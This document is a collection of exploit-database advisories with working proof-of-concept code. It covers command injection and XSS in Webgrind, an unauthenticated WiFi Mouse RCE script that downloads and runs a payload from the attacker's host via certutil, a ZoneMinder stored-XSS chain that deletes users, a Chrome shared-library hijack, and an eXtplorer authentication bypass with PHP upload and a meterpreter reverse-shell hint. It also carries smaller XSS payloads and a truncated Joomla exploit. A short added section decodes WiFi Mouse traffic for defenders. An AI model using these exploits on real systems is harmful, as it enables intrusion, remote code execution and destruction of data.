<pre><code># Exploit Title: Scdbg 1.0 - Buffer overflow DoS<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-06-13<br /># Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152<br /># Software Link : https://github.com/dzzie/VS_LIBEMU<br /># Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45<br /># Tested on: Windows 7, 10<br /><br />CVSS v3: 7.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H<br />CWE: CWE-400<br /><br />Vulnerability description: scdbg.exe (all versions) is affected by a Denial of Service vulnerability: emulating a specific 8-byte shellcode, with or without the /foff (start offset) parameter, crashes the emulator. Malware could embed this byte sequence so that the analysis terminates before the rest of the shellcode is emulated, thereby evading the scan.<br /><br />Proof of concept:<br /><br />Save this script as scdbg_crash.py, run it, then run: scdbg.exe -foff 1 -f scdbg_crash.bin (or scdbg.exe -f scdbg_crash.bin)<br /><br />#!/usr/bin/env python<br /><br /># The 8 bytes that crash the emulator. The file is written in binary mode so that<br /># no text-mode encoding or newline translation alters them (works on Python 2 and 3).<br />crash = b"\x90\xF6\x84\x01\x90\x90\x90\x90"<br />with open("scdbg_crash.bin", "wb") as f:<br />    f.write(crash)<br /><br />You can also use gui_launcher.exe with "Start offset 0x" ticked and set to 1, or left unticked; the crash occurs either way.<br /><br /></code></pre>
<pre><code># Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: http://github.com/jokkedk/webgrind/<br /># Software Link : http://github.com/jokkedk/webgrind/<br /># Tested Version: 1.1<br /># Tested on: Windows 10 using XAMPP<br /><br /># Vulnerability Type: Remote Command Execution (RCE)<br /><br />CVSS v3: 9.8<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-78<br /><br />Vulnerability description: A Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allows remote unauthenticated attackers to inject OS commands via the dataFile parameter of /<webgrind_path_directory>/index.php.<br /><br />Proof of concept:<br /><br />http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph<br /><br />And calc.exe opens on the server.<br /><br />Note: the decoded payload is 0'&calc.exe&'; the quotes close the quoted argument and the & characters are necessary for the injected command to execute.<br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS)<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Webgrind v1.1 and before does not sufficiently encode user-controlled input, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the file parameter of /<webgrind_path_directory>/index.php: the value is echoed unencoded into the page <title>, so a payload that closes the title element can inject script.<br /><br />Proof of concept:<br /><br />http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E<br /><br />Response:<br />...<br /><title><br />webgrind - fileviewer: </title><script>alert(1);</script><title> </title><br /><script type="text/javascript" charset="utf-8"><br /><br /></code></pre>
<pre><code># Exploit Title: Grafana <=6.2.4 - HTML Injection<br /># Date: 30-06-2019<br /># Exploit Author: SimranJeet Singh<br /># Vendor Homepage: https://grafana.com/<br /># Software Link: https://grafana.com/grafana/download/6.2.4<br /># Version: 6.2.4<br /># CVE : CVE-2019-13068<br /><br />The file public/app/features/panel/panel_ctrl.ts in Grafana before 6.2.5 allows HTML injection in panel drilldown links (via the Title or URL field).<br /><br />Payload used - <img src="[image_URL]"><h1>Hello</h1><br /><br />Best Regards,<br /><br />SimranJeet<br /><br /></code></pre>
<pre><code># Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)<br /># Date: 13-10-2022<br /># Author: Payal<br /># Vendor Homepage: http://necta.us/<br /># Software Link: http://wifimouse.necta.us/#download<br /># Version: 1.8.3.2<br /># Tested on: Windows 10 Pro Build 21H2<br /><br /># The desktop server used by the mobile app has a PIN option, but the PIN does not prevent command input:<br /># the server answers the connection with 'needpassword', which only the mobile app interprets (it prompts<br /># for the PIN). A raw TCP client can ignore that reply and send commands straight away.<br />#!/usr/bin/env python3<br />from socket import socket, AF_INET, SOCK_STREAM<br />from time import sleep<br />import sys<br /><br />target = socket(AF_INET, SOCK_STREAM)<br />port = 1978<br />try:<br />    rhost = sys.argv[1]<br />    lhost = sys.argv[2]<br />    payload = sys.argv[3]<br />except IndexError:<br />    print("USAGE: python " + sys.argv[0] + " <target-ip> <local-http-server-ip> <payload-name>")<br />    exit()<br /><br /><br /># ASCII hex codes of the characters that can be typed; each one is sent as its own "utf8 <char>\n" frame<br />characters = {<br />    "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",<br />    "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",<br />    "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",<br />    "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",<br />    "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",<br />    " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",<br />    ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",<br />    "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",<br />    "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}<br /><br />def openCMD():<br />    # "openfile /C/Windows/System32/cmd.exe\n"<br />    target.send(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"))<br /><br />def SendString(text):<br />    for char in text:<br />        # "utf8 " + character + "\n": one keystroke per frame<br />        target.send(bytes.fromhex("7574663820" + characters[char] + "0a"))<br />        sleep(0.03)<br /><br />def SendReturn():<br />    # 'key  3RTN' (Enter) - the same frame the 'Remote Mouse' mobile app sends<br />    target.send(bytes.fromhex("6b657920203352544e"))<br />    sleep(0.5)<br /><br />def exploit():<br />    print("[+] 3..2..1..")<br />    sleep(2)<br />    openCMD()<br />    print("[+] *Super fast hacker typing*")<br />    sleep(1)<br />    # type a certutil download of the payload from the attacker's HTTP server into the opened cmd.exe<br />    SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload)<br />    SendReturn()<br />    print("[+] Retrieving payload")<br />    sleep(3)<br />    SendString("C:\\Windows\\Temp\\" + payload)<br />    SendReturn()<br />    print("[+] Done! Check Your Listener?")<br /><br />def main():<br />    target.connect((rhost, port))<br />    exploit()<br />    target.close()<br />    exit()<br /><br />if __name__ == "__main__":<br />    main()<br /><br /></code></pre>
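The hex constants in the PoC above are plain ASCII: "7574663820…0a" is the line "utf8 <char>\n", "6f70656e66696c65…0a" is "openfile /C/Windows/System32/cmd.exe\n" and "6b657920203352544e" is "key  3RTN". The server speaks a newline-terminated plaintext protocol, which is why a raw TCP client that ignores the 'needpassword' reply can drive it without the PIN. The following is an added example, not part of the advisory: the frame builders, the capture decoder and the sample captured frames (with the made-up listener address 10.0.0.5 and payload name rev.exe) are mine. It builds the same frames from plain strings, checks them against the advisory's hex constants, and decodes a captured frame sequence back into the keystrokes that were typed, which is what you want when reviewing a packet capture of port 1978 from a compromised host.

```python
"""WiFi Mouse (TCP/1978) frame builder and capture decoder.

Added example, not part of the advisory above. The frame layouts are taken
from the hex constants in the PoC; the sample capture below is constructed.
  b"utf8 <char>\\n"      one keystroke, sent as UTF-8 text (not as a hex code)
  b"openfile <path>\\n"  open a file or executable on the desktop
  b"key  <name>"         a named key, e.g. "3RTN" for Enter (two spaces, no newline)
"""
from __future__ import annotations


def text_frames(text: str) -> list[bytes]:
    """One 'utf8' frame per character, exactly as the PoC's SendString() sends them."""
    return [b"utf8 " + ch.encode("utf-8") + b"\n" for ch in text]


def openfile_frame(path: str) -> bytes:
    """'openfile <path>\\n', as sent by the PoC's openCMD()."""
    return b"openfile " + path.encode("utf-8") + b"\n"


def key_frame(name: str) -> bytes:
    """'key  <name>' (two spaces, no trailing newline), as sent by SendReturn() with '3RTN'."""
    return b"key  " + name.encode("utf-8")


def parse_frame(frame: bytes) -> tuple[str, str]:
    """Split one frame into (command, argument). A 'utf8' argument is kept verbatim so
    that a typed space (b"utf8  \\n") survives; other arguments are trimmed."""
    cmd, _, arg = frame.rstrip(b"\n").partition(b" ")
    if cmd != b"utf8":
        arg = arg.strip()
    return cmd.decode("utf-8"), arg.decode("utf-8")


def reconstruct_input(frames: list[bytes]) -> dict:
    """Replay captured frames and return what was opened and what was typed.
    'key 3RTN' is folded into the typed text as a newline, so the result reads
    like the transcript the victim's cmd.exe saw."""
    opened: list[str] = []
    typed: list[str] = []
    for frame in frames:
        cmd, arg = parse_frame(frame)
        if cmd == "utf8":
            typed.append(arg)
        elif cmd == "openfile":
            opened.append(arg)
        elif cmd == "key" and arg == "3RTN":
            typed.append("\n")
    return {"opened": opened, "typed": "".join(typed)}


def verify_against_advisory() -> bool:
    """Cross-check the builders against the three hex constants used in the PoC."""
    return (
        text_frames("A")[0] == bytes.fromhex("7574663820" + "41" + "0a")
        and openfile_frame("/C/Windows/System32/cmd.exe")
        == bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a")
        and key_frame("3RTN") == bytes.fromhex("6b657920203352544e")
    )


# Constructed sample capture: the frames the PoC would send for its certutil download step
# (10.0.0.5 and rev.exe are made-up values for the listener host and payload name)
SAMPLE_FRAMES = (
    [openfile_frame("/C/Windows/System32/cmd.exe")]
    + text_frames("certutil.exe -urlcache -f http://10.0.0.5/rev.exe C:\\Windows\\Temp\\rev.exe")
    + [key_frame("3RTN")]
)

if __name__ == "__main__":
    print("builders match the advisory's hex constants:", verify_against_advisory())
    print(reconstruct_input(SAMPLE_FRAMES))
```

Because the frames are plain text, a network sensor rule for "openfile " or "utf8 " lines on TCP/1978 coming from a host that is not the user's phone is enough to spot this abuse; the decoder above turns such a capture into the exact command line the attacker typed.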
<pre><code># Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)<br /># Date: 10/01/2022<br /># Exploit Author: Trenches of IT<br /># Vendor Homepage: https://github.com/ZoneMinder/zoneminder<br /># Version: v1.36.26<br /># Tested on: Linux/Windows<br /># CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291<br /># Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/<br />#<br /># Proof of Concept:<br /># 1 - The PoC logs in as a low-privileged user, obtains a valid CSRF token and injects an XSS payload (which carries the delete-user request) into the logs. (The injection repeats every second until manually stopped.)<br /># 2 - An admin user navigates to http://<target>/zm/index.php?view=log<br /># 3 - The XSS executes the delete function on the target UID (user) in the admin's session.<br /><br />import requests<br />import re<br />import time<br />import argparse<br />import sys<br /><br />def getOptions(args=sys.argv[1:]):<br />    parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -zU lowpriv -zP lowpriv -d 1")<br />    parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4)", required=True)<br />    parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80)", required=True)<br />    parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv)", required=True)<br />    parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv)", required=True)<br />    parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7)", required=True)<br />    options = parser.parse_args(args)<br />    return options<br /><br />options = getOptions(sys.argv[1:])<br />base = "http://" + options.ip + ":" + options.port<br /><br /># Injected into the log entry's "file" field: closes the table cell/row the log viewer renders it in,<br /># then loads the delete-user action as a script in the viewing admin's session<br />payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>"<br /><br /># Cookies shared by every request (copied from a browser session); ZMSESSID is added per request<br />baseCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up"}<br /><br />#Request to login and get the response headers (no session cookie is sent, so the server issues one in Set-Cookie)<br />loginUrl = base + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password<br />loginCookies = dict(baseCookies)<br />loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"}<br />response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)<br />zmHeaders = response.headers<br />try:<br />    zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders))<br />    finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';')<br />except IndexError:<br />    print("[ERROR] Ensure the provided username and password is correct.")<br />    sys.exit(1)<br />print("Collected the low privilege user session token: "+finalSession)<br /><br />#Request using the session to obtain the CSRF value<br />csrfUrl = base + "/zm/index.php?view=filter"<br />csrfCookies = {**baseCookies, "ZMSESSID": '"' + finalSession + '"'}<br />csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"}<br />response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)<br />zmBody = response.text<br />extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody))<br />finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '')<br />print("Collected the CSRF key for the log injection request: "+finalCsrfKey)<br />print("Navigate here with an admin user: " + base + "/zm/index.php?view=log")<br /><br />while True:<br /><br />    #XSS Request: create a log entry whose "file" field carries the payload<br />    xssUrl = base + "/zm/index.php"<br />    xssCookies = {**baseCookies, "ZMSESSID": finalSession}<br />    xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}<br />    xssData = {"__csrf_magic": finalCsrfKey, "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}<br />    response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)<br />    print("Injecting payload: " + response.text)<br /><br />    time.sleep(1)<br /><br /></code></pre>
<pre><code># Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: Sinem Şahin<br /># Date: 2022-10-08<br /># Vendor Homepage: https://www.csphere.eu/<br /># Version: 2011.4<br /># Tested on: Windows & XAMPP<br /><br />==> Tutorial <==<br /><br />1- Go to the following URL: http://(HOST)/index.php?mod=buddys&action=create&id=925872<br />2- Enter the XSS payload in the username field of the buddy list create form.<br />3- Press the "Save" button.<br /><br />XSS Payload ==> "<script>alert("usernameXSS")</script><br /><br />Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md<br /><br /></code></pre>
<pre><code># Exploit Title: FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)<br /># Date: 2020-09-24<br /># Exploit Author: Sinem Şahin<br /># Vendor Homepage: https://flatcore.org/<br /># Version: 2.1.1<br /># Tested on: Windows & XAMPP<br /><br />==> Tutorial <==<br /><br />1- Go to the following URL: http://(HOST)/install/index.php<br />2- Enter the XSS payload in the username field of the user account created by the installer.<br />3- Press the "Save" button.<br /><br />XSS Payload ==> "<script>alert("usernameXSS")</script><br /><br /></code></pre>
<pre><code>#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu)<br />Product: Google Chrome<br />Discovered by: Rafay Baloch and Muhammad Samak<br />#Version: 109.0.5414.74<br />#Impact: Moderate<br />#Company: Cyber Citadel<br />#Website: https://www.cybercitadel.com<br />#Tested-on : Ubuntu 22.04.1<br /><br />*Description*<br /><br />Google Chrome attempts to load the shared library 'libnssckbi.so' from a user-writable location:<br />PATH: /home/$username/.pki/nssdb/libnssckbi.so<br />Because the directory the library is loaded from is writable by the user, code execution inside the Chrome process can be achieved by placing a malicious shared object named `libnssckbi.so` at that path.<br /><br /><br /><br />*exploit*<br /><br />The following PoC reproduces the issue (run it as the target user):<br /><br />#!/bin/sh<br />echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."<br />echo "[*] Checking ~/.pki/nssdb PATH"<br />if [ -d "$HOME/.pki/nssdb" ]<br />then<br />    echo "[+] Directory Exists..."<br />    if [ -w "$HOME/.pki/nssdb" ]<br />    then<br />        echo "[+] Directory is writable..."<br />        echo "[+] Generating malicious File libnssckbi.so ..."<br />        echo "#define _GNU_SOURCE" > "$HOME/.pki/nssdb/exploit.c"<br />        echo "#include <unistd.h>" >> "$HOME/.pki/nssdb/exploit.c"<br />        echo "#include <stdio.h>" >> "$HOME/.pki/nssdb/exploit.c"<br />        echo "#include <stdlib.h>" >> "$HOME/.pki/nssdb/exploit.c"<br />        echo "void f() {" >> "$HOME/.pki/nssdb/exploit.c"<br />        echo 'printf("Code Executed............ TMGM :)\n");' >> "$HOME/.pki/nssdb/exploit.c"<br />        echo "}" >> "$HOME/.pki/nssdb/exploit.c"<br />        # -Wl,-init,f makes f() the shared object's init routine, so it runs as soon as Chrome loads the library<br />        gcc -c -Wall -Werror -fpic "$HOME/.pki/nssdb/exploit.c" -o "$HOME/.pki/nssdb/exploit.o"<br />        gcc -shared -o "$HOME/.pki/nssdb/libnssckbi.so" -Wl,-init,f "$HOME/.pki/nssdb/exploit.o"<br />    fi<br />fi<br /><br />Upon closing the browser window, the application loads the library and executes the malicious code.<br /><br /><br />*Impact*<br /><br />The attacker can use this behavior to bypass application whitelisting rules, since the code runs inside the trusted Chrome process.<br />This behavior can also lead to DoS attacks.<br />An attacker can trick a victim into supplying credentials by creating a fake prompt.<br />Note that the path lies inside the victim's own home directory, so the attacker already needs the ability to write there as that user (the PoC checks this with -w before proceeding).<br /></code></pre>
<pre><code># Exploit Title: eXtplorer <= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)<br /># Exploit Author: ErPaciocco<br /># Author Website: https://erpaciocco.github.io<br /># Vendor Homepage: https://extplorer.net/<br />#<br /># Vendor:<br /># ==============<br /># extplorer.net<br />#<br /># Product:<br /># ==================<br /># eXtplorer <= v2.1.14<br />#<br /># eXtplorer is a PHP and JavaScript-based file manager: it allows browsing<br /># directories, editing, copying, moving, deleting, searching, uploading and<br /># downloading files, creating and extracting archives, creating new files and<br /># directories, changing file permissions (chmod) and more. It is often used as<br /># an FTP extension for popular applications like Joomla.<br />#<br /># Vulnerability Type:<br /># ======================<br /># Authentication Bypass (& Remote Command Execution)<br />#<br />#<br /># Vulnerability Details:<br /># =====================<br />#<br /># eXtplorer's authentication mechanism lets an attacker log in to the admin<br /># panel knowing only the victim's username, not the password: the check is<br /># bypassed by omitting the 'password' field from the login POST request.<br /># Once logged in, the file upload action is used to drop a PHP file into the<br /># web root, which gives remote code execution.<br />#<br />#<br /># Tested on Windows<br />#<br />#<br /># Reproduction steps:<br /># ==================<br />#<br /># 1) Navigate to Login Panel<br /># 2) Intercept authentication POST request to /index.php<br /># 3) Remove 'password' field<br /># 4) Send it and enjoy!<br />#<br />#<br /># Exploit code(s):<br /># ===============<br />#<br /># Run below PY script from CLI...<br />#<br /># [eXtplorer_auth_bypass.py]<br />#<br /><br /># Proof Of Concept<br /><br />try:<br />    import requests<br />except ImportError:<br />    print("ERROR: RUN: pip install requests")<br />    exit()<br />import sys<br />import re<br />import random<br />import string<br />import base64<br /><br />TARGET = None<br />WORDLIST = None<br /><br />_BUILTIN_WL = [<br />    'root',<br />    'admin',<br />    'test',<br />    'guest',<br />    'info',<br />    'adm',<br />    'user',<br />    'administrator'<br />]<br /><br />_HOST = None<br />_PATH = None<br />_SESSION = None<br />_HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0',<br />            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',<br />            'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3',<br />            'Accept-Encoding': 'gzip, deflate, br',<br />            'Connection': 'keep-alive'}<br /><br />def detect():<br />    global _HOST<br />    global _PATH<br />    global _SESSION<br /><br />    _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2]<br />    _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/')<br /><br />    _SESSION = requests.Session()<br /><br />    # extplorer.xml is served unauthenticated and carries the installed version<br />    raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False)<br /><br />    if raw.status_code == 200:<br />        ver = re.findall(r"<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE)<br /><br />        # group 3 is the last numeric component (the patch level): 2.1.14 and below are vulnerable<br />        if int(ver[0][2]) < 15:<br />            return True<br /><br />    return False<br /><br />def auth_bypass():<br />    global WORDLIST<br /><br />    _HEADERS['X-Requested-With'] = 'XMLHttpRequest'<br /><br />    # no 'password' field at all: this is the bypass<br />    params = {'option': 'com_extplorer',<br />              'action': 'login',<br />              'type': 'extplorer',<br />              'username': 'admin',<br />              'lang': 'english'}<br /><br />    if WORDLIST != None:<br />        if WORDLIST == _BUILTIN_WL:<br />            info("Attempting to guess a username from the builtin wordlist")<br />            wl = _BUILTIN_WL<br />        else:<br />            info(f"Attempting to guess a username from wordlist: {WORDLIST[0]}")<br />            with open(WORDLIST[0], "r") as f:<br />                wl = f.read().split('\n')<br />        for user in wl:<br />            params['username'] = user<br /><br />            info(f"Trying with {user}")<br /><br />            res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)<br />            if "successful" in res.text:<br />                return user<br />    else:<br />        res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)<br /><br />        if "successful" in res.text:<br />            return 'admin'<br /><br />    return False<br /><br />def rce():<br />    # the upload action is CSRF-protected; the token is exposed in the served functions.js<br />    tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js", headers=_HEADERS, verify=False)<br />    token = re.findall(r"token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0]<br /><br />    info(f"CSRF Token obtained: {token}")<br /><br />    payload = editPayload()<br /><br />    info("Payload edited to fit local parameters")<br /><br />    params = {'option': 'com_extplorer',<br />              'action': 'upload',<br />              'dir': f"./{_PATH}",<br />              'requestType': 'xmlhttprequest',<br />              'confirm': 'true',<br />              'token': token}<br /><br />    name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))<br />    files = {'userfile[0]': (f"{name}.php", payload)}<br /><br />    req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False)<br /><br />    if "successful" in req.text:<br />        info(f"File {name}.php uploaded in root dir")<br />        info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php")<br /><br />def attack():<br />    if not TARGET:<br />        error("TARGET needed")<br />        exit(1)<br /><br />    if not detect():<br />        error("eXtplorer vulnerable instance not found!")<br />        exit(1)<br />    else:<br />        info("eXtplorer endpoint is vulnerable!")<br />        username = auth_bypass()<br />        if username:<br />            info("Auth bypassed!")<br />            rce()<br />        else:<br />            error("Username 'admin' not found")<br /><br />def error(message):<br />    print(f"[E] {message}")<br /><br />def info(message):<br />    print(f"[I] {message}")<br /><br />def editPayload():<br />    # You can generate a payload with msfvenom and paste the base64-encoded result below<br />    # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64<br />    return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==")<br /><br />def help():<br />    print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution<br /><br />Usage:<br />    python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb]<br /><br />Options:<br />    -t    Target host. Provide target IP address (and optionally port).<br />    -w    Wordlist for user enumeration and authentication (Optional)<br />    -wb   Use built-in wordlist for user enumeration (Optional)<br />    -h    Show this help menu.<br />""")<br />    return True<br /><br /># flag -> (number of values it takes, handler); handlers receive the slice of argv that follows the flag<br />args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))),<br />        "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))),<br />        "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))),<br />        "h" : (0, lambda *x: (help() and exit(0)))}<br /><br />if __name__ == "__main__":<br />    i = 1<br />    [<br />        args[arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0])])<br />        for arg in [k for k in sys.argv[i:]]<br />        if arg[0] == '-'<br />    ]<br />    attack()<br />else:<br />    help()<br /><br /><br /># ///////////////////////////////////////////////////////////////////////<br /><br /># [Script examples]<br />#<br />#<br /># c:\>python eXtplorer_auth_bypass.py -t https://target.com<br /># c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt<br /># c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb<br /><br /># Exploitation Method:<br /># ======================<br /># Remote<br /><br /># [+] Disclaimer<br /># The information contained within this advisory is supplied "as-is" with no<br /># warranties or guarantees of fitness of use or otherwise.<br /># Permission is hereby granted for the redistribution of this advisory,<br /># provided that it is not altered except by reformatting it, and<br /># that due credit is given. Permission is explicitly given for insertion in<br /># vulnerability databases and similar, provided that due credit<br /># is given to the author. The author is not responsible for any misuse of the<br /># information contained herein and accepts no responsibility<br /># for any damage caused by the use or misuse of this information.<br /><br /></code></pre>
<pre><code>#!/usr/bin/env ruby<br /><br /># Exploit<br />## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure<br />## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)<br />## Author website: https://pwn.by/noraj/<br />## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752<br />## Date: 2023-03-24<br />## Vendor Homepage: https://www.joomla.org/<br />## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz<br />## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)<br />## Tested on: Joomla! Version 4.2.7<br />## CVE : CVE-2023-23752<br /><br /># Vulnerability<br />## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab<br />## Date: 2023-02-24<br />## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/<br />## Title: Joomla Unauthorized Access<br />## CVE: CVE-2023-23752<br />## Patch: Update to >= 4.2.8<br />## References:<br />## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/<br />## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html<br />## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752<br />## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752<br />## - https://vulncheck.com/blog/joomla-for-rce<br />## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml<br /><br /># standard library<br />require 'json'<br /># gems<br />require 'httpx'<br />require 'docopt'<br />require 'paint'<br /><br />doc = <<~DOCOPT<br />  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', 